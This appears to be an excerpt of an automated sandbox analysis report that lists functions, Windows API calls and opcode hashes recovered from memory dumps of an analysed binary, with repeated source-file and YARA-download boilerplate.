Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 6b437c51a0237620220ac28e62aa16d269046bb9e585148f6b23d7f034a1a3c0
Instruction ID: b119b3586534fb59d4f6c2b7334b51c3d961f7817a58fc5568a07f7e32cd0417
Opcode Fuzzy Hash: 6b437c51a0237620220ac28e62aa16d269046bb9e585148f6b23d7f034a1a3c0
Instruction Fuzzy Hash: C2C1C522A0A682C7EB62AB15E44027DEB51BB52F84F974135DE4E073B9CF3CE541C721

Function 00007FF7A52209C4 Relevance: 10.7, APIs: 7, Instructions: 248COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32 ref: 00007FF7A5220AAF
SafeArrayAccessData.OLEAUT32 ref: 00007FF7A5220B05
SafeArrayAccessData.OLEAUT32 ref: 00007FF7A5220BEC
SafeArrayUnaccessData.OLEAUT32 ref: 00007FF7A5220C13
SafeArrayAccessData.OLEAUT32 ref: 00007FF7A5220C24
SafeArrayAccessData.OLEAUT32 ref: 00007FF7A5220C92
SafeArrayAccessData.OLEAUT32 ref: 00007FF7A5220D07

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 00c2af4dc047eb3328d9db7280bab1605e51150c83bde12361ed7da654b6a987
Instruction ID: f72c5ccb6221d3321455029d7ff9d574c1fdbf9055fa74efe1a0cfeafd4064d3
Opcode Fuzzy Hash: 00c2af4dc047eb3328d9db7280bab1605e51150c83bde12361ed7da654b6a987
Instruction Fuzzy Hash: F1A1A0AAE0A60245FB24AB65C8843FCA7A0EB46F54F964431DA0D976F9EF7DD440C360

Function 00007FF7A51A2100 Relevance: 10.7, APIs: 7, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
Instruction ID: bec90dbe931834838a4deace263c442b502403a135887599780c11d1176154e9
Opcode Fuzzy Hash: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
Instruction Fuzzy Hash: 89A19B72A096C087D7259F19F4046BEFB61FB8AB94F954126EA8913B6CCB3CD442CF10

Function 00007FF7A524FB28 Relevance: 10.7, APIs: 7, Instructions: 212windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32 ref: 00007FF7A524FBED
IsWindowEnabled.USER32 ref: 00007FF7A524FBFA
SendMessageW.USER32 ref: 00007FF7A524FD22
SendMessageW.USER32 ref: 00007FF7A524FE2A

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: MessageSendWindow$Enabled
String ID:
API String ID: 3694350264-0
Opcode ID: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
Instruction ID: 93d0efe711e56490a24c54a4462ac2eaeb5e6d42fad8a2ed77c141c676812054
Opcode Fuzzy Hash: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
Instruction Fuzzy Hash: 859172A2E1A64685FB74AA15D8543B9A3B1AFC6F84F964032CA4D037F9CF2DE451C720

Function 00007FF7A5219034 Relevance: 10.7, APIs: 7, Instructions: 153windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00007FF7A5219089
GetKeyboardState.USER32 ref: 00007FF7A521909D
SetKeyboardState.USER32 ref: 00007FF7A52190EC
PostMessageW.USER32 ref: 00007FF7A5219122
PostMessageW.USER32 ref: 00007FF7A5219147
PostMessageW.USER32 ref: 00007FF7A5219190
PostMessageW.USER32 ref: 00007FF7A52191B9

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
Instruction ID: 0a76a85689f232028de55da478f644f5a8f310f70d842a48bbb1920d0ea27ab6
Opcode Fuzzy Hash: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
Instruction Fuzzy Hash: 0A51A1E2A4E2D155F7619B715D0067EAF91FB47FC0F8A8074DA8917B9ACA2DE490C320

Function 00007FF7A522DBF0 Relevance: 10.6, APIs: 7, Instructions: 137networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET ref: 00007FF7A522DC5F
HttpOpenRequestW.WININET ref: 00007FF7A522DCA9
InternetCloseHandle.WININET ref: 00007FF7A522DDC0

Part of subcall function 00007FF7A522EAB8: GetLastError.KERNEL32 ref: 00007FF7A522EAD4
Part of subcall function 00007FF7A522EAB8: SetEvent.KERNEL32 ref: 00007FF7A522EAE9

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Internet$CloseConnectErrorEventHandleHttpLastOpenRequest
String ID:
API String ID: 3401586794-0
Opcode ID: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
Instruction ID: d1e3d3e121c18d674b996ad33aa2d08919da30ee80033eab310af05b5453a12b
Opcode Fuzzy Hash: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
Instruction Fuzzy Hash: 5A51C4BA605B8186F714EF21AC006AEA7A4FB4AF88F954035DE0D03BA8DF3DD456C710

Function 00007FF7A5214860 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 124comlibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A520B748: CLSIDFromProgID.OLE32 ref: 00007FF7A520B771
Part of subcall function 00007FF7A520B748: ProgIDFromCLSID.OLE32 ref: 00007FF7A520B790
Part of subcall function 00007FF7A520B748: lstrcmpiW.KERNEL32 ref: 00007FF7A520B7A2
Part of subcall function 00007FF7A520B748: CoTaskMemFree.OLE32 ref: 00007FF7A520B7B4

IIDFromString.OLE32 ref: 00007FF7A52148EF
CoCreateInstance.OLE32 ref: 00007FF7A5214931
SetErrorMode.KERNEL32 ref: 00007FF7A521496D
GetProcAddress.KERNEL32 ref: 00007FF7A5214983
SetErrorMode.KERNEL32 ref: 00007FF7A5214A15

Strings

DllGetClassObject, xrefs: 00007FF7A5214973

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: From$ErrorModeProg$AddressCreateFreeInstanceProcStringTasklstrcmpi
String ID: DllGetClassObject
API String ID: 668425406-1075368562
Opcode ID: 214bc254c47588fde01e5fc27ee3c6930efb076d9c02937a19424ffc77af6643
Instruction ID: b47c8f611c0acf0a64205e97444dd64adf16a38144199042280588d6ce8dc11c
Opcode Fuzzy Hash: 214bc254c47588fde01e5fc27ee3c6930efb076d9c02937a19424ffc77af6643
Instruction Fuzzy Hash: 6551A0B2A19B4682EB14AF16ED5037AA360FB46F84F924034DB4D47AA9DF7CF054C790

Function 00007FF7A5249248 Relevance: 10.6, APIs: 7, Instructions: 111windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32 ref: 00007FF7A524928B
GetWindowLongW.USER32 ref: 00007FF7A5249313
SendMessageW.USER32 ref: 00007FF7A524935A
SendMessageW.USER32 ref: 00007FF7A5249389
GetWindowLongW.USER32 ref: 00007FF7A52493A0
SetWindowLongPtrW.USER32(?,?,?,00007FF7A524DF83), ref: 00007FF7A52493C4

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: LongMessageSendWindow
String ID:
API String ID: 3360111000-0
Opcode ID: 10b92532f4478cd50d58fa8196457338f991273d8d1c085252422c4c1f4f913a
Instruction ID: f1af8b7f29e44988a2825a05910eb967395c7749355738a19575eea4b2ff86ac
Opcode Fuzzy Hash: 10b92532f4478cd50d58fa8196457338f991273d8d1c085252422c4c1f4f913a
Instruction Fuzzy Hash: C54175A6B56A4581EB60DB19D890578B760EBC6F94F968132CE1E47BF8CF3DE441C310

Function 00007FF7A52337A8 Relevance: 10.6, APIs: 7, Instructions: 103networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A5235E00: inet_addr.WSOCK32(?,?,?,?,?,?,?,00007FF7A52337FB), ref: 00007FF7A5235E4D

socket.WSOCK32 ref: 00007FF7A5233827
WSAGetLastError.WSOCK32 ref: 00007FF7A5233836

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: 6f732a3ceb6dc8ae0713a757b729ef5f32bd0ba729350ec97b60288269ebfabf
Instruction ID: 14e0430917f553d19d0a30c7ccd21e83212b162ba3e9f82304f4bbfaa18c67c2
Opcode Fuzzy Hash: 6f732a3ceb6dc8ae0713a757b729ef5f32bd0ba729350ec97b60288269ebfabf
Instruction Fuzzy Hash: 02419172A0968282E764AB25E8442BDB360FB56FA4F824231DE5E437E9CF3CE545C710

Function 00007FF7A524A884 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00007FF7A524A8D1
SetMenu.USER32 ref: 00007FF7A524A8E4
GetMenuItemInfoW.USER32 ref: 00007FF7A524A977
IsMenu.USER32 ref: 00007FF7A524A991
CreatePopupMenu.USER32 ref: 00007FF7A524A99B
InsertMenuItemW.USER32 ref: 00007FF7A524A9D1
DrawMenuBar.USER32 ref: 00007FF7A524A9DA

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID:
API String ID: 161812096-0
Opcode ID: 22fcd4b96cb08b999353f17b01c1e421480795c8207f5970277f026457662bef
Instruction ID: d7181a40b60cf7355e4a367694f8feb94317cb57ff9e08c01272b7fc7b728d05
Opcode Fuzzy Hash: 22fcd4b96cb08b999353f17b01c1e421480795c8207f5970277f026457662bef
Instruction Fuzzy Hash: 06415A76B06A0585E750DF62D8806AD73B1FB96F98F964035DE4D037A8CF39E485C710

Function 00007FF7A52415C4 Relevance: 10.6, APIs: 7, Instructions: 90registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32 ref: 00007FF7A524161B
RegOpenKeyExW.ADVAPI32 ref: 00007FF7A524164F
FreeLibrary.KERNEL32 ref: 00007FF7A5241742

Part of subcall function 00007FF7A52415C4: RegCloseKey.ADVAPI32 ref: 00007FF7A5241675
Part of subcall function 00007FF7A52415C4: FreeLibrary.KERNEL32 ref: 00007FF7A52416D5
Part of subcall function 00007FF7A52415C4: RegEnumKeyExW.ADVAPI32 ref: 00007FF7A5241712

RegDeleteKeyW.ADVAPI32 ref: 00007FF7A52416C1

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: fa94a490bcff5352d4611bed330528fad8175282c266d08f0e682cee49e7ebff
Instruction ID: dce24d9d51c330e0cd25b79664f5c1a0741d82c09c228ccb587671397fea13f6
Opcode Fuzzy Hash: fa94a490bcff5352d4611bed330528fad8175282c266d08f0e682cee49e7ebff
Instruction Fuzzy Hash: 73418272A59B8595E720DF11E8547EAB3B0FB8AB44F850131EA4D07AACCF3DD149C710

Function 00007FF7A5214FCC Relevance: 10.6, APIs: 7, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF7A5215028
MultiByteToWideChar.KERNEL32 ref: 00007FF7A5215059
SysAllocString.OLEAUT32 ref: 00007FF7A5215062
SysAllocString.OLEAUT32 ref: 00007FF7A5215086
SysFreeString.OLEAUT32 ref: 00007FF7A5215092
StringFromGUID2.OLE32 ref: 00007FF7A52150B0
SysAllocString.OLEAUT32 ref: 00007FF7A52150BF

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 470201b7a7510a06dd913372f332e36f0e26382b67c565ba0de27237d0cac92a
Instruction ID: 3afd807767bd025f599c5f84645d5f2fff0a431e9444f3143094c571b588ca34
Opcode Fuzzy Hash: 470201b7a7510a06dd913372f332e36f0e26382b67c565ba0de27237d0cac92a
Instruction Fuzzy Hash: 92319471B0AB4585DB20AF12E844179B3A0FB5AFD0F898235DA5D037E8CF3DE4848754

Function 00007FF7A5214EB0 Relevance: 10.6, APIs: 7, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF7A5214F03
MultiByteToWideChar.KERNEL32 ref: 00007FF7A5214F34
SysAllocString.OLEAUT32 ref: 00007FF7A5214F3D
SysAllocString.OLEAUT32 ref: 00007FF7A5214FA5

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: AllocByteCharMultiStringWide
String ID:
API String ID: 3603722519-0
Opcode ID: cf43f2be6eb4bd68818497ac57658916f6485d2528bb62b4acf40de2ec05e3b3
Instruction ID: 9d5dd23c4bf2f9b86751af1347f0b6688b8476c2d88dd591e4ff51065ebeb960
Opcode Fuzzy Hash: cf43f2be6eb4bd68818497ac57658916f6485d2528bb62b4acf40de2ec05e3b3
Instruction Fuzzy Hash: E0317271B0AB4589DB20AF11EC44569F3A0FB56FA0F994236DA5D037E9CF3DE4848750

Function 00007FF7A524AEDC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51A932C: CreateWindowExW.USER32 ref: 00007FF7A51A93BC
Part of subcall function 00007FF7A51A932C: GetStockObject.GDI32 ref: 00007FF7A51A93D9
Part of subcall function 00007FF7A51A932C: SendMessageW.USER32 ref: 00007FF7A51A93EC

SendMessageW.USER32 ref: 00007FF7A524AF8C
SendMessageW.USER32 ref: 00007FF7A524AFA0
SendMessageW.USER32 ref: 00007FF7A524AFB4
SendMessageW.USER32 ref: 00007FF7A524AFCB
SendMessageW.USER32 ref: 00007FF7A524AFE3

Strings

Msctls_Progress32, xrefs: 00007FF7A524AF12

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 175e965b11afd85df2c3a996d4a298cb258778d92a24fde76c77afeddb8f143d
Instruction ID: a327608cdfb05e4fb0663d6fb2ad9da79121d75cca81c44efa146aa6f083a4a4
Opcode Fuzzy Hash: 175e965b11afd85df2c3a996d4a298cb258778d92a24fde76c77afeddb8f143d
Instruction Fuzzy Hash: 06319C7261A68187E3609F25F844B1AB361EB99B90F419139EB8903FA8CF3DD441CF10

Function 00007FF7A521FAFC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF7A521FB23
CreatePipe.KERNEL32 ref: 00007FF7A521FB6F

Strings

nul, xrefs: 00007FF7A521FBB3

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 0134d29867f6a044a915cc83a074af2c17d8f13ec2a8203597b3b6c722d2df41
Instruction ID: 2c78c2dfbc41fd230a18d9efa0c6f8a8707d5b123c0c3a841c902b9bb33c8b96
Opcode Fuzzy Hash: 0134d29867f6a044a915cc83a074af2c17d8f13ec2a8203597b3b6c722d2df41
Instruction Fuzzy Hash: 223141B2A19A4681EB10AF24DC1437AA2A0FB96F78F910334DA7D067E8DF3DD545C721

Function 00007FF7A521F9EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF7A521FA11
CreatePipe.KERNEL32 ref: 00007FF7A521FA5D

Strings

nul, xrefs: 00007FF7A521FA99

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: c3b93562104d94dec8cab7a09dad708560240dd78c66e81481d559291ba52c16
Instruction ID: 8824b8da57a3332610ce8fb9a29d6309fd9f6b4b7c93865218a58e3fdf3a9c4e
Opcode Fuzzy Hash: c3b93562104d94dec8cab7a09dad708560240dd78c66e81481d559291ba52c16
Instruction Fuzzy Hash: BD2173B2A19A4681EB10AB14DC1437AA3A0FB96F78F914331DA7D067E8DF7DD044C760

Function 00007FF7A51A8F40 Relevance: 9.2, APIs: 6, Instructions: 246COMMON

Download Yara Rule

APIs

GetClientRect.USER32(0000001B,?,00000000,?,?,00000000,?,00007FF7A51A8EBA), ref: 00007FF7A51A8F7D
GetWindowRect.USER32(?,00000000,?,?,00000000,?,00007FF7A51A8EBA), ref: 00007FF7A51A8FBF
ScreenToClient.USER32 ref: 00007FF7A51A8FE5
GetClientRect.USER32(0000001B,?,00000000,?,?,00000000,?,00007FF7A51A8EBA), ref: 00007FF7A51A9175
GetWindowRect.USER32(?,00000000,?,?,00000000,?,00007FF7A51A8EBA), ref: 00007FF7A51A919E
GetSystemMetrics.USER32 ref: 00007FF7A51EE005

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
